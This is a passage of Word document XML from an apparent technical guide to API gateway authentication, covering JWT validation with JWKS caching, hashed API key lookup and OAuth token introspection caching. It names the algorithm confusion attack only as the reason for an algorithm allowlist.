        </w:rPr>
        <w:t>never trust the client's declared algorithm blindly</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>. A classic JWT attack is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>algorithm confusion attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>: a token signed with alg: none (no signature) or alg: HS256 (HMAC with the RS256 public key as the HMAC secret) passed to a server expecting RS256. The gateway must maintain an </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>allowlist of permitted algorithms</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> per route — reject any token declaring an algorithm not on the allowlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE06F9D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Fetch the signing key:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Use the kid to look up the corresponding public key from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWKS (JSON Web Key Set)</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26DC30" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D9E48B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>GET https://auth.example.com/.well-known/jwks.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522190CC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="6CBCB5F4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D354C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10126E91" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "keys": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E286EDE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60320B58" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      "kty": "RSA",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA20DB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      "use": "sig",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB755D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      "kid": "key-id-123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D21162" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      "n": "&lt;base64url-encoded modulus&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1909B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      "e": "AQAB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A455707" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61287222" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF688D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AE022" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWKS caching internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06855C4F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Fetching JWKS on every request is unacceptable (one additional HTTP call per request = 2x latency). The gateway caches JWKS responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45330203" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="852"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Cache TTL from Cache-Control header of the JWKS response (typically 1–24 hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E11996" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="852"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>On cache miss (new kid encountered or cache expired): fetch JWKS, cache all keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F69EE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="852"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>On verification failure with a cached key: </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one retry with a forced JWKS refresh</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — handles key rotation where the new key hasn't propagated to cache yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFB285" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="852"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>JWKS endpoint unavailability: serve from stale cache (fail-open for availability) or reject all requests (fail-closed for security). Policy decision based on use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6050BD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key rotation race condition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> When the identity provider rotates keys, there's a window where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490633E2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="853"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Old tokens signed with the old key are still valid (haven't expired).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E013B0C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="853"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>New tokens are signed with the new key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042FBF2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="853"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway may have cached the old JWKS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C862C9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The one-retry-on-failure mechanism handles this: validation fails with the cached old key → gateway fetches fresh JWKS → finds the new key → validation succeeds. The kid field ensures the gateway fetches the correct key rather than trying all cached keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168273C4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4 — Verify the signature:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Reconstruct the signature input: base64url(header) + "." + base64url(payload). For RS256: verify the signature against this input using the RSA public key (RSA-PKCS1-v1_5 with SHA-256). For ES256: verify using ECDSA with P-256 curve and SHA-256. Signature verification is the cryptographically intensive step — dominated by modular exponentiation for RSA (milliseconds) or elliptic curve point multiplication for ECDSA (sub-millisecond). Hardware acceleration (e.g., OpenSSL with CPU crypto extensions) is essential at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FE944" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5 — Validate standard claims:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C49EFD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13F5C0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>exp (expiration): current_time &lt; exp (reject if expired)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7962D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>nbf (not before): current_time &gt;= nbf (reject if not yet valid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D91B81" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>iss (issuer): must exactly match configured expected issuer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0117EE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>aud (audience): must include this gateway's configured audience value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFC6CD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clock skew tolerance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Client and server clocks are never perfectly synchronized. A 60-second clock skew allowance prevents rejecting tokens that expired "1 second ago" due to clock differences. This skew allowance also slightly extends the window for compromised tokens — a security-availability trade-off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A68EF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6 — Custom claim validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The gateway can enforce application-specific claims:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75187715" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="854"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>scope must include the required scope for the requested endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D4DCD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="854"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>roles must include a required role for admin endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBE7DFA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="854"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>tenant_id must match the hostname of the request (preventing cross-tenant token reuse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F3A4C0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7 — Inject claims into backend request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> After successful validation, the gateway extracts claims and injects them as headers for the backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F045E27" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059CB026" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-User-ID: user123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E5B33" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-User-Roles: customer,premium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D929D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-User-Scopes: read:orders write:payments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E57C5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Token-Issuer: https://auth.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B49E607" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The backend trusts these headers </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only from the gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — it must verify they came from a trusted source. If a client can directly reach the backend (bypassing the gateway), they could inject fake X-User-ID headers. Backend services should only be reachable through the gateway, enforced via network policies or mTLS (the gateway presents a certificate the backend verifies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A5CA2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Key Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31906E45" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>API keys are simpler than JWTs — opaque strings that identify a client. The gateway must look up each API key against a store to validate it and retrieve associated metadata (rate limits, allowed endpoints, client identity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE3287B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API key storage and lookup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194C13E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>In-memory hash map:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve"> Keys are loaded into the gateway's memory at startup and updated on configuration changes. O(1) lookup. Limited to small key sets (millions of keys → GB of </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>memory). No network round-trip. Problem: key revocation requires propagating the revocation to all gateway instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C610BC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Redis lookup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Each request queries Redis for the API key. O(1) lookup in Redis. Works for any scale of key set. Adds ~0.5–2ms latency per request (Redis round-trip). Key revocation is instant — delete the key from Redis. The gateway must handle Redis unavailability (fail-open vs fail-closed policy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437CD264" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Bloom filter + Redis hybrid:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> A Bloom filter in gateway memory filters obviously invalid keys (keys not in the Bloom filter are definitely invalid → reject immediately without Redis call). Keys that pass the Bloom filter are verified against Redis. This eliminates Redis calls for invalid API keys (wrong keys, typos, invalid formats) — which may be a significant fraction of traffic on public APIs under attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A02052" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashed API key storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804A308" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>API keys must be stored </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashed</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (SHA-256 or bcrypt) in the backing store — not in plaintext. If the database is compromised, plaintext keys can be immediately used. Hashed keys require the attacker to brute-force each key (computationally expensive for long, random keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EF616B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lookup for hashed keys:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> On each request, hash the presented key (SHA-256 is fast, appropriate for long random keys). Look up the hash. This adds ~microsecond overhead — negligible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7914D9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bcrypt for API keys:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> bcrypt is deliberately slow (100ms+ per hash) — good for passwords (rate-limits brute force), but prohibitive for API key validation on every request. SHA-256 is appropriate for API keys because they're long, random strings (not human-memorable passwords that benefit from bcrypt's slow hashing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46218D8B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth 2.0 Token Introspection at the Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FD6A1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>For systems using opaque OAuth 2.0 tokens (random strings, not JWTs), the gateway must call the authorization server's introspection endpoint to validate each token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C199CC0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F6FC7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>POST https://auth.example.com/oauth/introspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68901336" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DEA70" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="3457B323" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>token=opaque-token-abc123&amp;token_type_hint=access_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238027A6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="067DCE4B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235FD58F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E909F46" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "active": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B0F7A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "sub": "user123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCDAD5C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "scope": "read:orders",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36808DF2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "exp": 1735689600,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD2497D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  "client_id": "mobile-app"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A32AD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6156F0D6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The caching strategy for introspection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F622159" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Without caching, introspection adds one full HTTP round-trip to every request — potentially 50–200ms depending on authorization server proximity. With caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A64AD8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="855"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Cache the introspection result keyed by the token value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50920F71" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="855"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>TTL = min(response's exp - current_time, configurable_max_ttl).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E674D20" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="855"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>On TTL expiry, re-introspect on next request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C068DC2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The revocation window:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Caching introspection results means revoked tokens remain valid until the cache entry expires. If a token is revoked and the cache TTL is 5 minutes, the token continues to work for up to 5 minutes. This is the fundamental tension between performance (caching) and security (instant revocation). The maximum cache TTL should match the acceptable revocation lag for your use case.</w:t>
      </w:r>
    </w:p>
